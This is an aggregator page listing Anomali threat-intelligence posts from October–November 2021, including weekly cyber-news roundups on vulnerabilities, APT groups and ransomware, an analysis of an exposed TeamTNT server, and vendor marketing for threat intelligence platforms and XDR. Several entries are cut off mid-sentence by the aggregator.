A proof-of-concept (PoC) tool to test for the recently revealed BrakTooth flaws in Bluetooth devices, and the researchers who discovered them have released both the test kit and full exploit code for the bugs. On Thursday, CISA urged manufacturers, vendors and developers to patch or employ workarounds. On Monday, the University of Singapore researchers updated their table of affected devices, after the chipset vendors Airoha, Mediatek and Samsung reported that some of their devices are vulnerable.
Analyst Comment: Users are urged to patch or employ workarounds as soon as possible.
Tags: Bluetooth, BrakTooth, Exploit, Vulnerability
CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution
(published: November 4, 2021)
Researchers at SentinelOne have identified a vulnerability in the TIPC Module, part of the Linux Kernel. The Transparent Inter-Process Communication (TIPC) module is a protocol that is used for cluster-wide operation and is packaged as part of most major Linux distributions. The vulnerability, designated as “CVE-2021-43267”, is a heap overflow vulnerability that could be exploited to execute code within the kernel.
Analyst Comment: TIPC users should ensure their Linux kernel version is not between 5.10-rc1 and 5.15.
Tags: Linux, TIPC, Vulnerabiltity
Ukraine Links Members Of Gamaredon Hacker Group To Russian FSB
(published: November 4, 2021)
The Ukrainian Secret Service claims to have identified five members of the threat group, Gamaredon. The group, who Ukraine are claiming to be operated by the Russian Federal Security Service (FSB), are believed to be behind over 5,000 attacks against Ukraine. These attacks usually consist of malicious documents and using a template injection vulnerability, the group has targeted government, public and private entities.
Analyst Comment: Users should be careful that a file is sent via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. Users should be careful when viewing documents that ask for macros to be enabled.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204
Tags: Gamaredon, Malicious Documents, Russia, Ukraine, Template Injection
|
Ransomware Data Breach Malware Tool Vulnerability Threat | ||
|
2021-11-02 15:00:00 | Anomali Cyber Watch: Russian Intelligence Targets IT Providers, Malspam Abuses Squid Games, Another npm Library Compromise, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data leak, Critical services, Money laundering, Phishing, Ransomware, and Supply-chain. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BlackMatter: New Data Exfiltration Tool Used in Attacks
(published: November 1, 2021)
Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild.
Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation.
MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048
Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention
Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations
(published: October 31, 2021)
Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei.
Analyst Comment: Iran has not provided evidence behind the attribution, so |
Ransomware Malware Tool Threat Guideline | APT 29 APT 29 | |
|
2021-10-19 15:00:00 | Anomali Cyber Watch: FIN12 Ramps-Up in Europe, Interactsh Being Used For Malicious Purposes, New Yanluowang Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Strike, Metasploit, Phishing, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Harvester: Nation-State-Backed Group Uses New Toolset To Target Victims In South Asia
(published: October 18, 2021)
A new threat group dubbed ‘Harvester’ has been found attacking organizations in South Asia and Afghanistan using a custom toolset composed of both public and private malware. Given the nature of the targets, which include governments, IT and Telecom companies, combined with the information stealing campaign, there is a high likelihood that this group is Nation-State backed. The initial infection method is unknown, but victim machines are directed to a URL that checks for a local file (winser.dll). If it doesn’t exist, a redirect is performed for a VBS file to download and run; this downloads and installs the Graphon backdoor. The command and control (C2) uses legitimate Microsoft and CloudFront services to mask data exfiltration.
Analyst Comment: Nation-state threat actors are continually evolving their tactics, techniques and tools to adapt and infiltrate victim governments and/or companies. Ensure that employees have a training policy that reflects education on only downloading programs or documents from known, trusted sources. It is also important to notify management and the proper IT department if you suspect malicous activity may be occurring.
MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Process Discovery - T1057
Tags: Backdoor.Graphon, Cobalt Strike Beacon, Metasploit
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
(published: October 14, 2021)
Unit 42 researchers have observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers - but also by attackers - to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof-of-concept (PoC) for an exploit can insert "Interactsh" to check whether the exploit is working, but the service could also be used to check if the PoC is working. The tool became publicly available on April 16, 2021, and the first attempts to abuse it were observed soon after, on April 18, 2021.
Analyst Comment: As the landscape changes, researchers and attackers will often use the same tools in order to reach a goal. In this instance, Interact.sh can be used to show if an exploit will work. Dual-use tools are often under fire for being able to validate malicious code, with this being the latest example. If necessary, take precautions and block traffic with interact.sh attached to it within company networks.
Tags: Interactsh, Exploits
|
Ransomware Spam Malware Tool Vulnerability Threat Patching Guideline | ||
|
2021-10-13 14:30:00 | Climbing the Threat Intelligence Maturity Curve (lien direct) | Creating a Successful Threat Intelligence Program Cyber threats are relentless and constantly evolving. Staying ahead requires advanced automation and a holistic threat intelligence program (TIP), which lead to a strategic advantage. There are three main pillars to help your organization advance up the maturity curve: people, process, and technology. People: Identify stakeholders for reporting and feedback in mapping out a process that will effectively channel intelligence. Process: Processes that take threat intelligence to a more strategic level must be developed and agreed upon cross-functionally. Technology: The technology used should deliver on the processes outlined to ensure it supports organizational goals. Climbing the Threat Intel Maturity Curve While all organizations are at a unique level of development in their threat intelligence program, take general steps to determine where you are now and what is needed to evolve your program. Threat Data Collection Raw data collection is the beginning of any intelligence-gathering process. The relevancy of the data is critical, coming from external and internal sources, including open source and commercial threat intelligence feeds. External data may include reports on IoCs (e.g., ISACs, Dark Web, vendors, clients, etc.) relevant to organizational vulnerabilities. Internal data is just as necessary as it informs intelligence with business-specific threats. Even at the beginning stage of a program, feedback from internal teams that have experienced a security incident should inform threat intelligence feeds to ensure they are relevant to the business. Threat Data Processing Processing or curating the data of relevant threats based on the complete environment is the next stage of development. Even when using only the most relevant sources for incoming data, the volume can be overwhelming, and automation is essential. Security tools can save analysts time by automatically weeding through the data for information that is actionable. Based on the organization's threat experience, well-targeted criteria will optimize this curation, enabling the automation to filter out the noise and produce practical intelligence. Threat Intelligence Integration As threat intelligence is a shared resource essential to stakeholders in different business functions, integrating systems will enable more relevant reporting and a better flow of feedback to improve intelligence gathering. Having a solid configuration management database (CMDB) and vulnerability management program is fundamental to integrate systems and processes successfully. Forming a Digital Forensics Investigations team that runs intel feeds against the complete environment can add significantly to actionable cyber threat intelligence. Once the integration is complete and your organization operates based on the latest threat intelligence, threats can be identified and blocked quickly. In addition to a faster response, insights into the capabilities of threat actors can be gained to thwart attacks at an earlier stage and before they enter the network. Another advantage of comprehensive integration is the convergence of physical with logical security. A simple use case would be if someone badged into a facility and then got on the virtual private network (VPN). The system could raise a flag that an employee within the firewall should not need to access the VPN. The odd behavior could be due to a stolen badge or malicious cyber activity. Either way, it would trigger an alert. Measuring Threat Intel Effectiveness Measuring effectiveness is a pillar of a matur | Vulnerability Threat Guideline | ||
|
2021-10-12 17:41:00 | Anomali Cyber Watch: Aerospace and Telecoms Targeted by Iranian MalKamak Group, Cozy Bear Refocuses on Cyberespionage, Wicked Panda is Traced by Malleable C2 Profiles, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data leak, Ransomware, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report
(published: October 7, 2021)
Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%).
Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110
Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran
Ransomware in the CIS
(published: October 7, 2021)
Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto |
Ransomware Malware Tool Threat Guideline Prediction | APT 41 APT 41 APT 39 APT 29 APT 29 APT 28 | |
|
2021-10-11 14:30:00 | Selecting a Threat Intelligence Platform (TIP) (lien direct) | Do You Need a TIP? Many organizations struggle with managing threat intelligence. There is too much data noise, reliance on manual processes that make it harder to correlate relevant intelligence, and difficulties in producing and distributing actionable reports to the right people. Organizations turn to a Threat Intelligence Platform or TIP to help alleviate some of these problems. A TIP is like a nerve center that pulls raw data and intelligence from multiple sources into a central repository. Using automation, it sifts through and correlates that data to find relevant intelligence through curation, normalization, enrichment, and risk scoring. A TIP can create a feedback loop that integrates with existing security systems by analyzing and sharing relevant, actionable threat intelligence across an organization. Key benefits of a TIP are reducing time to detection, enabling collaboration, and producing actionable information for stakeholders. Top Considerations When Selecting a TIP Stakeholders The search for a TIP should begin with a clear understanding of the audience it will be serving. The most frequent users of a TIP are threat intelligence analysts, SOC analysts, cyber threat hunters, IR analysts, and CISOs, each with different needs and expectations they hope to garner from the TIP. For example, threat intelligence analysts can use the curated information to create adversary dossiers, while CISOs can execute on strategic goals and keep costs down through time saved by automation. Collaboration Collaboration and threat intelligence sharing between groups is a core benefit of a TIP. In selecting a TIP, it is fundamental to understand organizational structure and how communications flow. Different teams should be able to share knowledge from anywhere at any time and with the ability to integrate the TIP into existing security systems. Choose your TIP based on the collaboration you require. Another factor in collaboration is the reporting capabilities of a TIP. Complete reports will be automated, including real-time alerts and summaries customized for different stakeholders and your specific industry. Data Aggregation and Curation within Context The ability of a TIP to ingest customized imports of data from internal and external sources is at the heart of its functionality. The flexibility of setting up customized data imports while also automatically pulling information from vendors or trusted third parties empowers security analysts to be more efficient. They will also have the ability to parse and index both structured (e.g., STIX/TAXII) and unstructured data (e.g., blogs, whitepapers, etc.). Another critical function of a TIP is curating the information it takes in. Optimizing curated data is vital when clarifying the context within your platform. Malicious actors that directly affect your industry and organization will get targeted using the intelligence produced by your TIP. Therefore, how you import vendor data and modify it to your organization’s specific needs is critical. Machine learning algorithms should sort the information and weigh the individual indicators of compromise (IoCs) based on context and user-defined scoring and relevance. Vulnerabilities native to the organization are the other side of the context equation. A TIP needs to match high-scoring IoCs with "crown jewels" and other essential assets. Patching is utilized to protect the most critical infrastructure. Determining the vulnerability context upfront will help determine the feedback loop that a TIP needs to facilitate. Deployment | Vulnerability Threat Patching | ||
|
2021-10-06 19:06:00 | Inside TeamTNT\'s Impressive Arsenal: A Look Into A TeamTNT Server (lien direct) | Authored By: Tara Gould
Key Findings
Anomali Threat Research has discovered an open server to a directory listing that we attribute with high confidence to the German-speaking threat group, TeamTNT.
The server contains source code, scripts, binaries, and cryptominers targeting Cloud environments.
Other server contents include Amazon Web Services (AWS) Credentials stolen from TeamTNT stealers are also hosted on the server.
This inside view of TeamTNT infrastructure and tools in use can help security operations teams to improve detection capabilities for related attacks, whether coming directly from TeamTNT or other cybercrime groups leveraging their tools.
Overview
Anomali Threat Research has identified a TeamTNT server open to directory listing. The server was used to serve scripts and binaries that TeamTNT use in their attacks, and also for the IRC communications for their bot. The directory appears to have been in use since at least August 2021 and was in use as of October 5, 2021. The contents of the directory contain metadata, scripts, source code, and stolen credentials.
TeamTNT is a German-speaking, cryptojacking threat group that targets cloud environments. The group typically uses cryptojacking malware and have been active since at least April 2020.[1] TeamTNT activity throughout 2021 has targeted AWS, Docker, GCP, Linux, Kubernetes, and Windows, which corresponds to usual TeamTNT activity.[2]
Technical Analysis
Scripts (/cmd/)
Figure 1 - Overview of /cmd/
Contained on the server are approximately 50 scripts, most of which are already documented, located in the /cmd/ directory. The objective of the scripts vary and include the following:
AWS Credential Stealer
Diamorphine Rootkit
IP Scanners
Mountsploit
Scripts to set up utils
Scripts to setup miners
Scripts to remove previous miners
Figure 2 - Snippet of AWS Credential Stealer Script
Some notable scripts, for example, is the script that steals AWS EC2 credentials, shown above in Figure 2. The AWS access key, secret key, and token are piped into a text file that is uploaded to the Command and Control (C2) server.
Figure 3 - Chimaera_Kubernetes_root_PayLoad_2.sh
Another interesting script is shown in Figure 3 above, which checks the architecture of the system, and retrieves the XMRig miner version for that architecture from another open TeamTNT server, 85.214.149[.]236.
Binaries (/bin/)
Figure 4 - Overview of /bin
Within the /bin/ folder, shown in Figure 4 above, there is a collection of malicious binaries and utilities that TeamTNT use in their operations.
Among the files are well-known samples that are attributed to TeamTNT, including the Tsunami backdoor and a XMRig cryptominer. Some of the tools have the source code located on the server, such as TeamTNT Bot. The folder /a.t.b contains the source code for the TeamTNT bot, shown in Figures 5 and 6 below. In addition, the same binaries have been found on a TeamTNT Docker, noted in Appendix A.
|
Malware Tool Threat | Uber APT 32 | |
|
2021-10-06 15:00:00 | Thanks to Our Employees, Customers, and Partners, We Are Racing Ahead with Cloud XDR Innovations (lien direct) | Anomali is off to the races in this new fiscal year, fueled by our intelligence-driven security that addresses our customers’ differentiated threat detection use cases. We would like to thank our incredible employees who get up every morning to help our customers and partners stop breaches and attackers. Not only are we setting new records for the company, but also meaningfully helping businesses across the world succeed with their XDR framework. We thank our valued customers and partners for entrusting us to help them with their security efficacy and efficiency.
Our business continues to expand across the Fortune 500 and similar enterprise companies across the globe. We are expanding our government business with recent additions like the US Air Force and US Navy and have commenced our investment in building a FedRAMP certification program. We are also expanding our global channel partner program and opening new routes to market. We are particularly excited about our recent partnership with Capgemini, a leading global MDR/XDR provider.
We expect our Cloud open XDR product to be released in early spring. The respective beta program starts in December, and we are very pleased with the tremendous excitement from existing, prospective, and former customers that are going to participate.
At Anomali, we take pride in being the hub of trusted circles for our customers and partners and the fact that we seamlessly integrate with almost everyone in the security ecosystem. We believe that effective security operations start and end with global intelligence. Furthermore, we focus on differentiated use cases built with our customers and partners that enhance both security efficacy and efficiency – making us the Anomali in XDR (see image).
 |
Threat Guideline | ||
|
2021-10-06 14:30:00 | Making the Case for a Threat Intelligence Platform (lien direct) | Cyber Risks As the cyber threat landscape becomes rapidly more complex, the risk of breaches increases. The potential for severe financial loss, reputational damage, and non-compliance with regulations drive companies to invest in threat intelligence platforms. Threat Intelligence Platforms Threat intelligence platforms (TIP) are critical security tools that use global intelligence data to help proactively identify, mitigate and remediate security risks. A TIP pulls together key cyber threat defense functions, creating a holistic threat intelligence system. Some of the key benefits are operationalizing data gathering, processing data into intelligence, integrating information from various sources, streamlining the intelligence cycle, and better navigate the threat landscape. While this tool has obvious advantages to security professionals, making the business case to invest in a TIP can be a challenge. Making the Business Case for a TIP Speaking in a Language Management Understands The case needs to be made from management's perspective to justify the investment in a TIP. Start with mapping security objectives with management objectives, understanding the business risks that concern them vs. cyber threats in general, and quantifying the return on investment. Interviewing the heads of key intelligence stakeholders throughout the organization is a good way of gaining the insight needed to understand the business and how it is affected by cybersecurity. This communication can also create the trust that the security teams are working for them and their goals. Communication style is also essential. Security terms that are part of the everyday vocabulary of SOC analysts and threat intelligence teams may not be readily understandable by those in other functional areas. More technical language should be translated into basic concepts, and information should be contextualized to resonate with the audience. Visual mapping and use cases can be persuasive communication techniques. Visual mapping of the relationships between intelligence stakeholders can describe solutions in a way that transcends security terminology. Use cases from your own company or others in similar industries is an effective way of giving real-world context to a TIP implementation. Threat Intelligence Platform Return on Investment The bottom line for any investment is the quantifiable return it will have for the company. Cost savings are the most obvious contribution that threat intelligence tools can make to an organization. However, revenue generation can also be a significant payback of operationalized threat intelligence. Regulatory compliance can also contribute to a positive ROI. TIP Cost Reductions The cost of a devastating data breach is always top of mind for a company. Investing in a TIP that minimizes financial risk can be justified by focusing on relevant threats. Depending on the industry, the pure financial losses can be enormous. Breaches like those at Home Depot and Target have run into tens of millions of dollars. Potential direct operational fees for legal and forensic services, consultants, and customer care are most easily quantified. Harder to quantify but potentially just as costly are loss of brand equity and reputational damage. Better utilization of assets is also a significant contribution to cost reductions. Automation of data gathering, processing, and intelligence reporting saves threat intelligence analysts' time, freeing them for more strategic threat hunting, etc. A TIP can also eliminate the need for additional headcount and reduce time spent on chasing false positives. By replacing unnecessary security tools with a TIP that functions more effectively, you can further reduce costs. TIP Revenue Generation While cost reductions are a more typical contributor to calcu | Data Breach Tool Threat | ||
|
2021-10-05 18:28:00 | Anomali Cyber Watch: New APT ChamelGang, FoggyWeb, VMWare Vulnerability Exploited and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, FoggyWeb, Google Chrome Bugs, Hydra Malware, NOBELIUM and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google Just Patched These Two Chrome Zero-day Bugs That Are Under Attack Right Now
(published: October 1, 2021)
Google has warned users of Google Chrome to update to version 94.0.4606.71, due to two new zero-days that are currently being exploited in the wild. This marks the second update in a month due to actively exploited zero-day flaws. The first of these common vulnerabilities and exposures (CVEs), CVE-2021-37975, is a high severity flaw in the V8 JavaScript engine, which has been notoriously difficult to protect and could allow attackers to create malware that is resistant to hardware mitigations.
Analyst Comment: Users and organizations are recommended to regularly check for and apply updates to the software applications they use, especially web browsers that are increasingly used for a variety of tasks. Organizations can leverage the capabilities of Anomali Threatstream to rapidly get information about new CVEs that need to be mitigated through their vulnerability management program.
Tags: CVE-2021-37975, CVE-2021-37976, chrome, zero-day
Hydra Malware Targets Customers of Germany's Second Largest Bank
(published: October 1, 2021)
A new campaign leveraging the Hydra banking trojan has been discovered by researchers. The malware containing an Android application impersonates the legitimate application for Germany's largest bank, Commerzbank. While Hydra has been seen for a number of years, this new campaign incorporates many new features, including abuse of the android accessibility features and permissions which give the application the ability to stay running and hidden with basically full administrator privileges over a victim's phone. It appears to be initially spread via a website that imitates the official Commerzbank website. Once installed it can spread via bulk SMS messages to a user's contacts.
Analyst Comment: Applications, particularly banking applications, should only be installed from trusted and verified sources and reviewed for suspicious permissions they request. Similarly, emails and websites should be verified before using.
Tags: Banking and Finance, EU, Hydra, trojan
New APT ChamelGang Targets Russian Energy, Aviation Orgs
(published: October 1, 2021)
A new Advanced Persistent Threat (APT) group dubbed “ChamelGang” has been identified to be targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server’s ProxyShell and leveraging both new and existing malware to compromise networks. Researchers at Positive Technologies have been tracking the group since March 2017, and have observed that they have attacked targets in 10 countries so far. The group has been able to hi |
Ransomware Malware Tool Vulnerability Threat Guideline | Solardwinds Solardwinds APT 27 | |
|
2021-10-04 11:00:00 | The Need for Intelligence-Driven XDR to Address Security Team Challenges (lien direct) | As organizations continue to expand and evolve their digital footprint, security staff struggle to adapt operations quickly enough to ensure effective monitoring and response to incidents in their environment. These challenges are even more difficult due to limited staff and expertise. Enter extended detection and response or XDR. Depending on who you ask, you'll get differing opinions about what XDR is, where it came from, and whether or not you need it. The fact is security teams continue to struggle with too many security tools from different vendors, with little integration of data or relevant threat intelligence. These tools generate an alarming volume of alerts, leading to analysts chasing false positives or not looking into data because they lack the intelligence and expertise to prioritize the alerts that matter. They’re also working in siloed environments, which makes it hard to collaborate and leads to more problems, including: Overwhelming volumes of data make it difficult to prioritize security efforts and response They lack insight into global threats and incidents and are unable to recognize the potential impact of known and unknown threats The detection technologies they’ve installed are riddled with false positives that waste staff time The reliance on a single vendor and the inability to tune security controls across multi-vendor security stacks makes it harder to prioritize investigations and incident response efforts This is where XDR solutions come into play. We’ve aligned ourselves with Gartner’s definition of XDR, which states: "XDR is a security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components." In layman's terms: XDR provides a holistic, more straightforward view of threats across an organization's entire technology landscape, providing the real-time information needed to deliver threats to the right people for better, faster outcomes. Security teams can no longer only rely on the same tools they’ve used for threat detection and response. Automation and big data management are needed to collect data across all installed security telemetry, along with advanced intelligence to understand and correlate threats. The improved automation allows teams to sift through the never-ending deluge of data to pinpoint relevant threats and quickly respond to those that matter before they turn into something catastrophic. Anomali’s XDR solution combines our global threat intelligence with extended detection capabilities to stop breaches and attackers. Anomali XDR delivers: Unified threat detection utilizing all installed security telemetry Precision detection with timely alerts to stop threats earlier Increased ROI with less administrative overhead Higher fidelity alerts to reduce false positives and empower stretched IT teams Retrospective search capabilities across 5+ years Take a look at our webinar to learn more about how we can help you Pinpoint Relevant Threats w | Tool Threat Guideline | ||
|
2021-09-30 14:30:00 | The Need for Savvy Sharing of Threat Intelligence (lien direct) | Age of Threat Intelligence Sharing Given the range and sophistication of threat actors, combined with digital transformation and the proliferation of remote devices forming a growing potential attack surface, sharing threat intelligence has become vital. Not to mention, Threat Intelligence Sharing was a key component listed in President Biden’s Executive Order on cybersecurity. A company can no longer operate in a silo when cyber adversaries leverage a full range of tactics across multiple industries. Having a broader picture of these actors and their motivations requires sharing threat intelligence that reduces duplication of effort and response time. Intel Sharing Balancing Act While there are justifiable concerns with sharing threat intel, the benefits to be gained by smartly sharing are compelling enough to navigate legal and security issues. The goal of any cybersecurity program should be to detect potential indicators of compromise (IoCs) as rapidly as possible and perform mitigation before they reach the edges of the network. To quickly detect changes in the cybersecurity landscape, a wide scope of visibility is needed. When a company is actively engaged in sharing threat intel, the relevant information is passed quickly and more well-informed decisions can be made. In addition, analyses for internal stakeholders and intel consumers can be more insightful, relevant, and actionable. Privacy and liability are issues that need to be addressed. Data should be scrubbed for private information or sensitive corporate information before sharing and this should be set up ahead of time for any type of automated data transfer. Legal guidelines such as CISA or EU GDPR can help conform to regulations. Preparing for Information Sharing According to a guide published by NIST, preparation for a sharing program should include the following: Define the goals and objectives of information sharing Identify internal sources of threat information Define the scope of information sharing activities Establish information sharing rules Join a sharing community Plan to provide ongoing support for information sharing activities Starting small will help expand sharing in a safe and relevant manner. Learning to optimize the type of data, how to share it, and with whom to share it helps to create an efficient and cost-effective program. Gaining C-level and management support is essential to obtaining the necessary tools and cooperation that is needed. A cost/benefit analysis will help to convince management that the risks of sharing can be minimized and the upside will not only make the company safer but also save costs. Sharing intel may not only save a company from an expensive breach but can also save costs on the better allocation of resources. For example, metrics may include a decrease of alert events or incidents of getting ahead of an attack due to the sharing of cyber threat intelligence. An Accenture report on the cost of cybercrime found that security intelligence and threat sharing were a top cost-saving measure, saving companies on average $2.26M. What Intel Should be Shared? A good way to get started sharing intelligence is to collaborate and add context to other parties' shared information. This could include observed adversary behaviors, attacks seen, or details of incident response. Historical context can also be quite | Threat Guideline |
To see everything:
Our RSS (filtrered)
